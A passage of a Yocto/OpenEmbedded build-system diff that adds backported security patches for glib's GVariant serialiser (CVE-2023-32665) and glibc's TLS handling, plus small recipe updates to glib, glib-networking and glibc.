diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
new file mode 100644
index 0000000000..83d0205160
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
@@ -0,0 +1,49 @@
+From e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 16 Aug 2023 03:42:47 +0000
+Subject: [PATCH] gvariant: Port g_variant_deep_copy() to count its iterations
+ directly
+
+This is equivalent to what `GVariantIter` does, but it means that
+`g_variant_deep_copy()` is making its own `g_variant_get_child_value()`
+calls.
+
+This will be useful in an upcoming commit, where those child values will
+be inspected a little more deeply.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 7 +++----
+ 1 file changed, 3 insertions(+), 4 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index cdb428e..fdd36be 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5799,14 +5799,13 @@ g_variant_deep_copy (GVariant *value)
+ case G_VARIANT_CLASS_VARIANT:
+ {
+ GVariantBuilder builder;
+- GVariantIter iter;
+- GVariant *child;
++ gsize i, n_children;
+
+ g_variant_builder_init (&builder, g_variant_get_type (value));
+- g_variant_iter_init (&iter, value);
+
+- while ((child = g_variant_iter_next_value (&iter)))
++ for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
+ {
++ GVariant *child = g_variant_get_child_value (value, i);
+ g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
+ g_variant_unref (child);
+ }
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
new file mode 100644
index 0000000000..f098548618
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
@@ -0,0 +1,394 @@
+From d1a293c4e29880b8d17bb826c9a426a440ca4a91 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 01:30:38 +0000
+Subject: [PATCH] gvariant: Track checked and ordered offsets independently
+
+The past few commits introduced the concept of known-good offsets in the
+offset table (which is used for variable-width arrays and tuples).
+Good offsets are ones which are non-overlapping with all the previous
+offsets in the table.
+
+If a bad offset is encountered when indexing into the array or tuple,
+the cached known-good offset index will not be increased. In this way,
+all child variants at and beyond the first bad offset can be returned as
+default values rather than dereferencing potentially invalid data.
+
+In this case, there was no information about the fact that the indexes
+between the highest known-good index and the requested one had been
+checked already. That could lead to a pathological case where an offset
+table with an invalid first offset is repeatedly checked in full when
+trying to access higher-indexed children.
+
+Avoid that by storing the index of the highest checked offset in the
+table, as well as the index of the highest good/ordered offset.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/d1a293c4e29880b8d17bb826c9a426a440ca4a91]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 28 ++++++++++++++++++++++++
+ glib/gvariant-serialiser.c | 44 +++++++++++++++++++++++++++-----------
+ glib/gvariant-serialiser.h | 9 ++++++++
+ glib/gvariant.c | 1 +
+ glib/tests/gvariant.c | 5 +++++
+ 5 files changed, 75 insertions(+), 12 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index b951cd9..1b9d5cc 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -67,6 +67,7 @@ struct _GVariant
+ GBytes *bytes;
+ gconstpointer data;
+ gsize ordered_offsets_up_to;
++ gsize checked_offsets_up_to;
+ } serialised;
+
+ struct
+@@ -182,6 +183,24 @@ struct _GVariant
+ * This field is only relevant for arrays of non
+ * fixed width types and for tuples.
+ *
++ * .checked_offsets_up_to: Similarly to .ordered_offsets_up_to, this stores
++ * the index of the highest element, n, whose frame
++ * offsets (and all the preceding frame offsets)
++ * have been checked for validity.
++ *
++ * It is always the case that
++ * .checked_offsets_up_to ≥ .ordered_offsets_up_to.
++ *
++ * If .checked_offsets_up_to == .ordered_offsets_up_to,
++ * then a bad offset has not been found so far.
++ *
++ * If .checked_offsets_up_to > .ordered_offsets_up_to,
++ * then a bad offset has been found at
++ * (.ordered_offsets_up_to + 1).
++ *
++ * This field is only relevant for arrays of non
++ * fixed width types and for tuples.
++ *
+ * .tree: Only valid when the instance is in tree form.
+ *
+ * Note that accesses from other threads could result in
+@@ -386,6 +405,7 @@ g_variant_to_serialised (GVariant *value)
+ value->size,
+ value->depth,
+ value->contents.serialised.ordered_offsets_up_to,
++ value->contents.serialised.checked_offsets_up_to,
+ };
+ return serialised;
+ }
+@@ -418,6 +438,7 @@ g_variant_serialise (GVariant *value,
+ serialised.data = data;
+ serialised.depth = value->depth;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ children = (gpointer *) value->contents.tree.children;
+ n_children = value->contents.tree.n_children;
+@@ -464,10 +485,12 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
+ if (value->state & STATE_SERIALISED)
+ {
+ serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
++ serialised->checked_offsets_up_to = value->contents.serialised.checked_offsets_up_to;
+ }
+ else
+ {
+ serialised->ordered_offsets_up_to = 0;
++ serialised->checked_offsets_up_to = 0;
+ }
+
+ if (serialised->data)
+@@ -513,6 +536,7 @@ g_variant_ensure_serialised (GVariant *value)
+ value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
+ value->contents.serialised.bytes = bytes;
+ value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
++ value->contents.serialised.checked_offsets_up_to = G_MAXSIZE;
+ value->state |= STATE_SERIALISED;
+ }
+ }
+@@ -594,6 +618,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++ serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ if (!g_variant_serialised_check (serialised))
+ {
+@@ -644,6 +669,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ }
+
+ value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++ value->contents.serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ g_clear_pointer (&owned_bytes, g_bytes_unref);
+
+@@ -1120,6 +1146,7 @@ g_variant_get_child_value (GVariant *value,
+
+ /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
+ value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
++ value->contents.serialised.checked_offsets_up_to = MAX (value->contents.serialised.checked_offsets_up_to, serialised.checked_offsets_up_to);
+
+ /* Check whether this would cause nesting too deep. If so, return a fake
+ * child. The only situation we expect this to happen in is with a variant,
+@@ -1147,6 +1174,7 @@ g_variant_get_child_value (GVariant *value,
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
+ child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
++ child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
+
+ return child;
+ }
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index cd4a3e6..0bf7243 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -120,6 +120,8 @@
+ *
+ * @depth has no restrictions; the depth of a top-level serialised #GVariant is
+ * zero, and it increases for each level of nested child.
++ *
++ * @checked_offsets_up_to is always ≥ @ordered_offsets_up_to
+ */
+
+ /* < private >
+@@ -147,6 +149,9 @@ g_variant_serialised_check (GVariantSerialised serialised)
+ !(serialised.size == 0 || serialised.data != NULL))
+ return FALSE;
+
++ if (serialised.ordered_offsets_up_to > serialised.checked_offsets_up_to)
++ return FALSE;
++
+ /* Depending on the native alignment requirements of the machine, the
+ * compiler will insert either 3 or 7 padding bytes after the char.
+ * This will result in the sizeof() the struct being 12 or 16.
+@@ -266,6 +271,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (value.type_info);
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -297,7 +303,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
++ GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0, 0 };
+
+ gvs_filler (&child, children[0]);
+ }
+@@ -320,6 +326,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
+ value.type_info = g_variant_type_info_element (value.type_info);
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -362,6 +369,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
+
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -392,7 +400,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
++ GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0, 0 };
+
+ /* write the data for the child. */
+ gvs_filler (&child, children[0]);
+@@ -413,6 +421,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
+ value.size--;
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -739,39 +748,46 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+
+ /* If the requested @index_ is beyond the set of indices whose framing offsets
+ * have been checked, check the remaining offsets to see whether they’re
+- * normal (in order, no overlapping array elements). */
+- if (index_ > value.ordered_offsets_up_to)
++ * normal (in order, no overlapping array elements).
++ *
++ * Don’t bother checking if the highest known-good offset is lower than the
++ * highest checked offset, as that means there’s an invalid element at that
++ * index, so there’s no need to check further. */
++ if (index_ > value.checked_offsets_up_to &&
++ value.ordered_offsets_up_to == value.checked_offsets_up_to)
+ {
+ switch (offsets.offset_size)
+ {
+ case 1:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint8 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 2:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint16 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 4:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint32 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 8:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint64 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ default:
+ /* gvs_get_offset_size() only returns maximum 8 */
+ g_assert_not_reached ();
+ }
++
++ value.checked_offsets_up_to = index_;
+ }
+
+ if (index_ > value.ordered_offsets_up_to)
+@@ -916,6 +932,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+
+ /* All offsets have now been checked. */
+ value.ordered_offsets_up_to = G_MAXSIZE;
++ value.checked_offsets_up_to = G_MAXSIZE;
+
+ return TRUE;
+ }
+@@ -1040,14 +1057,15 @@ gvs_tuple_get_child (GVariantSerialised value,
+ * all the tuple *elements* here, not just all the framing offsets, since
+ * tuples contain a mix of elements which use framing offsets and ones which
+ * don’t. None of them are allowed to overlap. */
+- if (index_ > value.ordered_offsets_up_to)
++ if (index_ > value.checked_offsets_up_to &&
++ value.ordered_offsets_up_to == value.checked_offsets_up_to)
+ {
+ gsize i, prev_i_end = 0;
+
+- if (value.ordered_offsets_up_to > 0)
+- gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
++ if (value.checked_offsets_up_to > 0)
++ gvs_tuple_get_member_bounds (value, value.checked_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
+
+- for (i = value.ordered_offsets_up_to; i <= index_; i++)
++ for (i = value.checked_offsets_up_to; i <= index_; i++)
+ {
+ gsize i_start, i_end;
+
+@@ -1060,6 +1078,7 @@ gvs_tuple_get_child (GVariantSerialised value,
+ }
+
+ value.ordered_offsets_up_to = i - 1;
++ value.checked_offsets_up_to = index_;
+ }
+
+ if (index_ > value.ordered_offsets_up_to)
+@@ -1257,6 +1276,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+
+ /* All element bounds have been checked above. */
+ value.ordered_offsets_up_to = G_MAXSIZE;
++ value.checked_offsets_up_to = G_MAXSIZE;
+
+ {
+ gsize fixed_size;
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 144aec8..e132451 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -40,6 +40,15 @@ typedef struct
+ * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
+ * rather than an index into the frame offsets. */
+ gsize ordered_offsets_up_to;
++
++ /* Similar to @ordered_offsets_up_to. This gives the index of the child element
++ * whose frame offset is the highest in the offset table which has been
++ * checked so far.
++ *
++ * This is always ≥ @ordered_offsets_up_to. It is always an element index.
++ *
++ * See documentation in gvariant-core.c for `struct GVariant` for details. */
++ gsize checked_offsets_up_to;
+ } GVariantSerialised;
+
+ /* deserialisation */
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index fdd36be..f910bd4 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
+ serialised.size = g_variant_get_size (trusted);
+ serialised.data = g_malloc (serialised.size);
+ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
++ serialised.checked_offsets_up_to = G_MAXSIZE;
+ g_variant_store (trusted, serialised.data);
+ g_variant_unref (trusted);
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index a84b02e..640f3c0 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1286,6 +1286,7 @@ random_instance_filler (GVariantSerialised *serialised,
+
+ serialised->depth = 0;
+ serialised->ordered_offsets_up_to = 0;
++ serialised->checked_offsets_up_to = 0;
+
+ g_assert_true (serialised->type_info == instance->type_info);
+ g_assert_cmpuint (serialised->size, ==, instance->size);
+@@ -1453,6 +1454,7 @@ test_maybe (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised,
+ random_instance_filler,
+@@ -1577,6 +1579,7 @@ test_array (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1742,6 +1745,7 @@ test_tuple (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1839,6 +1843,7 @@ test_variant (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) &instance, 1);
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
new file mode 100644
index 0000000000..a523e60b91
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
@@ -0,0 +1,97 @@
+From 298a537d5f6783e55d87e40011ee3fd3b22b72f9 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 01:39:01 +0000
+Subject: [PATCH] gvariant: Zero-initialise various GVariantSerialised objects
+
+The following few commits will add a couple of new fields to
+`GVariantSerialised`, and they should be zero-filled by default.
+
+Try and pre-empt that a bit by zero-filling `GVariantSerialised` by
+default in a few places.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/298a537d5f6783e55d87e40011ee3fd3b22b72f9]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 2 +-
+ glib/tests/gvariant.c | 12 ++++++------
+ 2 files changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index f910bd4..8ba701e 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5936,7 +5936,7 @@ g_variant_byteswap (GVariant *value)
+ if (alignment)
+ /* (potentially) contains multi-byte numeric data */
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariant *trusted;
+ GBytes *bytes;
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 640f3c0..d640c81 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1446,7 +1446,7 @@ test_maybe (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariantSerialised child;
+
+ serialised.type_info = type_info;
+@@ -1572,7 +1572,7 @@ test_array (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+
+ serialised.type_info = array_info;
+ serialised.data = flavoured_malloc (needed_size, flavour);
+@@ -1738,7 +1738,7 @@ test_tuple (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+
+ serialised.type_info = type_info;
+ serialised.data = flavoured_malloc (needed_size, flavour);
+@@ -1835,7 +1835,7 @@ test_variant (void)
+
+ for (flavour = 0; flavour < 8; flavour += alignment)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ GVariantSerialised child;
+
+ serialised.type_info = type_info;
+@@ -2284,7 +2284,7 @@ serialise_tree (TreeInstance *tree,
+ static void
+ test_byteswap (void)
+ {
+- GVariantSerialised one, two;
++ GVariantSerialised one = { 0, }, two = { 0, };
+ TreeInstance *tree;
+
+ tree = tree_instance_new (NULL, 3);
+@@ -2358,7 +2358,7 @@ test_serialiser_children (void)
+ static void
+ test_fuzz (gdouble *fuzziness)
+ {
+- GVariantSerialised serialised;
++ GVariantSerialised serialised = { 0, };
+ TreeInstance *tree;
+
+ /* make an instance */
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
index 09d253fbfb..60a6b843c1 100644
--- a/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
+++ b/meta/recipes-core/glib-2.0/glib-2.0_2.62.6.bb
@@ -17,6 +17,45 @@ SRC_URI = "${GNOME_MIRROR}/glib/${SHRT_VER}/glib-${PV}.tar.xz \
file://0001-meson-Run-atomics-test-on-clang-as-well.patch \
file://0001-gio-tests-resources.c-comment-out-a-build-host-only-.patch \
file://tzdata-update.patch \
+ file://CVE-2020-35457.patch \
+ file://CVE-2021-27218.patch \
+ file://CVE-2021-27219-01.patch \
+ file://CVE-2021-27219-02.patch \
+ file://CVE-2021-27219-03.patch \
+ file://CVE-2021-27219-04.patch \
+ file://CVE-2021-27219-05.patch \
+ file://CVE-2021-27219-06.patch \
+ file://CVE-2021-27219-07.patch \
+ file://CVE-2021-27219-08.patch \
+ file://CVE-2021-27219-09.patch \
+ file://CVE-2021-27219-10.patch \
+ file://CVE-2021-27219-11.patch \
+ file://CVE-2021-27219-reg1-1.patch \
+ file://CVE-2021-27219-reg1-2.patch \
+ file://CVE-2021-27219-reg1-4.patch \
+ file://CVE-2021-27219-reg1-5.patch \
+ file://CVE-2021-27219-reg2-1.patch \
+ file://CVE-2021-27219-reg2-2.patch \
+ file://CVE-2021-27219-reg2-3.patch \
+ file://CVE-2021-28153-1.patch \
+ file://CVE-2021-28153-2.patch \
+ file://CVE-2021-28153-3.patch \
+ file://CVE-2021-28153-4.patch \
+ file://CVE-2021-28153-5.patch \
+ file://CVE-2023-32665-0001.patch \
+ file://CVE-2023-32665-0002.patch \
+ file://CVE-2023-32665-0003.patch \
+ file://CVE-2023-32665-0004.patch \
+ file://CVE-2023-32665-0005.patch \
+ file://CVE-2023-32665-0006.patch \
+ file://CVE-2023-32665-0007.patch \
+ file://CVE-2023-32665-0008.patch \
+ file://CVE-2023-32665-0009.patch \
+ file://CVE-2023-29499.patch \
+ file://CVE-2023-32611-0001.patch \
+ file://CVE-2023-32611-0002.patch \
+ file://CVE-2023-32643.patch \
+ file://CVE-2023-32636.patch \
"
SRC_URI_append_class-native = " file://relocate-modules.patch"
diff --git a/meta/recipes-core/glib-2.0/glib.inc b/meta/recipes-core/glib-2.0/glib.inc
index 7ebed0e5fd..1849a6e05c 100644
--- a/meta/recipes-core/glib-2.0/glib.inc
+++ b/meta/recipes-core/glib-2.0/glib.inc
@@ -4,7 +4,7 @@ HOMEPAGE = "https://developer.gnome.org/glib/"
# pcre is under BSD;
# docs/reference/COPYING is with a 'public domain'-like license!
-LICENSE = "LGPLv2.1+ & BSD & PD"
+LICENSE = "LGPLv2.1+ & BSD-3-Clause & PD"
LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \
file://glib/glib.h;beginline=4;endline=17;md5=b88abb7f3ad09607e71cb9d530155906 \
file://gmodule/COPYING;md5=4fbd65380cdd255951079008b364516c \
@@ -32,10 +32,6 @@ inherit meson gettext gtk-doc pkgconfig ptest-gnome upstream-version-is-even bas
GTKDOC_MESON_OPTION = "gtk_doc"
-# This avoids the need to depend on target python3, which in case of mingw is not even possible.
-# meson's python configuration pokes into python3 configuration, so this provides the native config to it.
-unset _PYTHON_SYSCONFIGDATA_NAME
-
S = "${WORKDIR}/glib-${PV}"
PACKAGECONFIG ??= "system-pcre libmount \
diff --git a/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb b/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
index b74532087c..c476a7cba5 100644
--- a/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
+++ b/meta/recipes-core/glib-networking/glib-networking_2.62.4.bb
@@ -31,4 +31,4 @@ FILES_${PN} += "\
FILES_${PN}-dev += "${libdir}/gio/modules/libgio*.la"
FILES_${PN}-staticdev += "${libdir}/gio/modules/libgio*.a"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
index 24de55d929..9aa24eccfe 100644
--- a/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
+++ b/meta/recipes-core/glibc/cross-localedef-native_2.31.bb
@@ -20,7 +20,7 @@ inherit autotools
FILESEXTRAPATHS =. "${FILE_DIRNAME}/${PN}:${FILE_DIRNAME}/glibc:"
SRC_URI = "${GLIBC_GIT_URI};branch=${SRCBRANCH};name=glibc \
- git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef \
+ git://github.com/kraj/localedef;branch=master;name=localedef;destsuffix=git/localedef;protocol=https \
\
file://0001-localedef-Add-hardlink-resolver-to-build.patch;patchdir=localedef \
\
diff --git a/meta/recipes-core/glibc/glibc-version.inc b/meta/recipes-core/glibc/glibc-version.inc
index 3bcd336de4..95e2bba301 100644
--- a/meta/recipes-core/glibc/glibc-version.inc
+++ b/meta/recipes-core/glibc/glibc-version.inc
@@ -1,6 +1,6 @@
SRCBRANCH ?= "release/2.31/master"
PV = "2.31+git${SRCPV}"
-SRCREV_glibc ?= "6fdf971c9dbf7dac9bea552113fe4694015bbc4d"
+SRCREV_glibc ?= "2d4f26e5cfda682f9ce61444b81533b83f6381af"
SRCREV_localedef ?= "cd9f958c4c94a638fa7b2b4e21627364f1a1a655"
GLIBC_GIT_URI ?= "git://sourceware.org/git/glibc.git"
diff --git a/meta/recipes-core/glibc/glibc.inc b/meta/recipes-core/glibc/glibc.inc
index 23a6ca99ae..e42040f3dc 100644
--- a/meta/recipes-core/glibc/glibc.inc
+++ b/meta/recipes-core/glibc/glibc.inc
@@ -1,7 +1,9 @@
require glibc-common.inc
require glibc-ld.inc
-DEPENDS = "virtual/${TARGET_PREFIX}gcc libgcc-initial linux-libc-headers"
+DEPENDS = "virtual/${TARGET_PREFIX}gcc virtual/${TARGET_PREFIX}binutils${BUSUFFIX} libgcc-initial linux-libc-headers"
+BUSUFFIX= ""
+BUSUFFIX:class-nativesdk = "-crosssdk"
PROVIDES = "virtual/libc"
PROVIDES += "virtual/libintl virtual/libiconv"
diff --git a/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
new file mode 100644
index 0000000000..dba491f4dc
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0030-elf-Refactor_dl_update-slotinfo-to-avoid-use-after-free.patch
@@ -0,0 +1,66 @@
+From c0669ae1a629e16b536bf11cdd0865e0dbcf4bee Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 21:52:38 +0000
+Subject: [PATCH] elf: Refactor _dl_update_slotinfo to avoid use after free
+
+map is not valid to access here because it can be freed by a concurrent
+dlclose: during tls access (via __tls_get_addr) _dl_update_slotinfo is
+called without holding dlopen locks. So don't check the modid of map.
+
+The map == 0 and map != 0 code paths can be shared (avoiding the dtv
+resize in case of map == 0 is just an optimization: larger dtv than
+necessary would be fine too).
+
+Reviewed-by: Adhemerval Zanella <adhemerval.zanella@linaro.org>
+---
+ elf/dl-tls.c | 21 +++++----------------
+ 1 file changed, 5 insertions(+), 16 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=c0669ae1a629e16b536bf11cdd0865e0dbcf4bee]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 24d00c14ef..f8b32b3ecb 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -743,6 +743,8 @@ _dl_update_slotinfo (unsigned long int req_modid)
+ {
+ for (size_t cnt = total == 0 ? 1 : 0; cnt < listp->len; ++cnt)
+ {
++ size_t modid = total + cnt;
++
+ size_t gen = listp->slotinfo[cnt].gen;
+
+ if (gen > new_gen)
+@@ -758,25 +760,12 @@ _dl_update_slotinfo (unsigned long int req_modid)
+
+ /* If there is no map this means the entry is empty. */
+ struct link_map *map = listp->slotinfo[cnt].map;
+- if (map == NULL)
+- {
+- if (dtv[-1].counter >= total + cnt)
+- {
+- /* If this modid was used at some point the memory
+- might still be allocated. */
+- free (dtv[total + cnt].pointer.to_free);
+- dtv[total + cnt].pointer.val = TLS_DTV_UNALLOCATED;
+- dtv[total + cnt].pointer.to_free = NULL;
+- }
+-
+- continue;
+- }
+-
+ /* Check whether the current dtv array is large enough. */
+- size_t modid = map->l_tls_modid;
+- assert (total + cnt == modid);
+ if (dtv[-1].counter < modid)
+ {
++ if (map == NULL)
++ continue;
++
+ /* Resize the dtv. */
+ dtv = _dl_resize_dtv (dtv);
+
+--
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
new file mode 100644
index 0000000000..25beee1d50
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0031-elf-Fix-data-races-in-pthread_create-and-TLS-access-BZ-19329.patch
@@ -0,0 +1,191 @@
+From 1387ad6225c2222f027790e3f460e31aa5dd2c54 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 30 Dec 2020 19:19:37 +0000
+Subject: [PATCH] elf: Fix data races in pthread_create and TLS access [BZ
+ #19329]
+
